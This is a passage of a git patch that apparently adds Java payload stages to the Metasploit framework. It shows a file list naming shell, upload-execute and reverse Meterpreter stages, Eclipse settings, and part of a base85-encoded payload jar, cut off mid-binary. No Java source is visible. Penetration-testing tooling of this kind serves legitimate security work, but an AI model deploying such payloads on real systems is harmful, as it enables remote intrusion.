From 232af015cb65de5e2fa51efdd39846a6b5d6bd48 Mon Sep 17 00:00:00 2001
From: James Lee <James_Lee@rapid7.com>
Date: Fri, 20 Aug 2010 07:09:51 +0000
Subject: [PATCH] add source code for javapayload, thanks mihi.  see #406

git-svn-id: file:///home/svn/framework3/trunk@10075 4d416f70-5f16-0410-b530-b9f4589650da
---
 external/source/javapayload/.classpath        |   6 +
 external/source/javapayload/.project          |  17 +
 .../.settings/org.eclipse.jdt.core.prefs      |  12 +
 .../javapayload/JavaPayload4Meterpreter.jar   | Bin 0 -> 19504 bytes
 external/source/javapayload/build.xml         |  68 ++++
 .../example-reverse-meterpreter.jar           | Bin 0 -> 8546 bytes
 .../source/javapayload/example-spawn-bind.jar | Bin 0 -> 4539 bytes
 .../javapayload/example-standalone-jsh.jar    | Bin 0 -> 10933 bytes
 external/source/javapayload/index.html        | 331 +++++++++++++++++
 .../MemoryBufferURLConnection.java            |  68 ++++
 .../MemoryBufferURLStreamHandler.java         |  17 +
 .../src/javapayload/stage/Exec.java           |  60 +++
 .../src/javapayload/stage/JSh.java            | 346 ++++++++++++++++++
 .../javapayload/stage/JShSignalSender.java    |  84 +++++
 .../javapayload/stage/JShStreamForwarder.java | 108 ++++++
 .../src/javapayload/stage/Meterpreter.java    |  25 ++
 .../src/javapayload/stage/SendParameters.java |  53 +++
 .../src/javapayload/stage/Shell.java          |  56 +++
 .../src/javapayload/stage/Stage.java          |  42 +++
 .../javapayload/stage/StreamForwarder.java    |  79 ++++
 .../src/javapayload/stage/SystemInfo.java     |  92 +++++
 .../src/javapayload/stage/UpExec.java         |  71 ++++
 .../javapayload/src/metasploit/Payload.java   | 308 ++++++++++++++++
 23 files changed, 1843 insertions(+)
 create mode 100644 external/source/javapayload/.classpath
 create mode 100644 external/source/javapayload/.project
 create mode 100644 external/source/javapayload/.settings/org.eclipse.jdt.core.prefs
 create mode 100644 external/source/javapayload/JavaPayload4Meterpreter.jar
 create mode 100644 external/source/javapayload/build.xml
 create mode 100644 external/source/javapayload/example-reverse-meterpreter.jar
 create mode 100644 external/source/javapayload/example-spawn-bind.jar
 create mode 100644 external/source/javapayload/example-standalone-jsh.jar
 create mode 100644 external/source/javapayload/index.html
 create mode 100644 external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLConnection.java
 create mode 100644 external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/Exec.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/JSh.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/JShSignalSender.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/JShStreamForwarder.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/Meterpreter.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/SendParameters.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/Shell.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/Stage.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/StreamForwarder.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/SystemInfo.java
 create mode 100644 external/source/javapayload/src/javapayload/stage/UpExec.java
 create mode 100644 external/source/javapayload/src/metasploit/Payload.java

diff --git a/external/source/javapayload/.classpath b/external/source/javapayload/.classpath
new file mode 100644
index 0000000000..3e7b356a50
--- /dev/null
+++ b/external/source/javapayload/.classpath
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<classpath>
+	<classpathentry kind="src" path="src"/>
+	<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/jre6"/>
+	<classpathentry kind="output" path="bin"/>
+</classpath>
diff --git a/external/source/javapayload/.project b/external/source/javapayload/.project
new file mode 100644
index 0000000000..c61d51830c
--- /dev/null
+++ b/external/source/javapayload/.project
@@ -0,0 +1,17 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<projectDescription>
+	<name>JavaPayload4Meterpreter</name>
+	<comment></comment>
+	<projects>
+	</projects>
+	<buildSpec>
+		<buildCommand>
+			<name>org.eclipse.jdt.core.javabuilder</name>
+			<arguments>
+			</arguments>
+		</buildCommand>
+	</buildSpec>
+	<natures>
+		<nature>org.eclipse.jdt.core.javanature</nature>
+	</natures>
+</projectDescription>
diff --git a/external/source/javapayload/.settings/org.eclipse.jdt.core.prefs b/external/source/javapayload/.settings/org.eclipse.jdt.core.prefs
new file mode 100644
index 0000000000..6e6b73c6c6
--- /dev/null
+++ b/external/source/javapayload/.settings/org.eclipse.jdt.core.prefs
@@ -0,0 +1,12 @@
+#Tue Aug 17 23:14:37 CEST 2010
+eclipse.preferences.version=1
+org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
+org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.1
+org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
+org.eclipse.jdt.core.compiler.compliance=1.3
+org.eclipse.jdt.core.compiler.debug.lineNumber=generate
+org.eclipse.jdt.core.compiler.debug.localVariable=generate
+org.eclipse.jdt.core.compiler.debug.sourceFile=generate
+org.eclipse.jdt.core.compiler.problem.assertIdentifier=ignore
+org.eclipse.jdt.core.compiler.problem.enumIdentifier=ignore
+org.eclipse.jdt.core.compiler.source=1.3
diff --git a/external/source/javapayload/JavaPayload4Meterpreter.jar b/external/source/javapayload/JavaPayload4Meterpreter.jar
new file mode 100644
index 0000000000000000000000000000000000000000..173be1a8512c53a566335e915bdd2c85147fcfc5
GIT binary patch
literal 19504
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
